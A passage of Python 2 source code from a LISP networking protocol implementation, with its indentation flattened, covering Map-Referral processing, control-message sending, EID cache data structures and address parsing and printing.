lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
# that wasn't in packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
timestamp = time.time()
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1, timestamp)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authenticaiton for Map-Register message and sent to supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be source from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if the NAT-traversal configured, use same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache[ml].entries = {}
self.cache[ml].entries_sorted = []
self.cache_sorted = sorted(self.cache)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry_key in self.cache[ml].entries_sorted:
entries = self.cache[ml].entries
if (entry_key in entries):
entry = entries[entry_key]
if (entry == None): continue
if (prefix.is_more_specific(entry.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache[ml].entries_sorted.remove(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be retunred if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is retunred is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the retunred entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python parcularity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow user to specify ff::/8 which allows for placing the the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#enif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
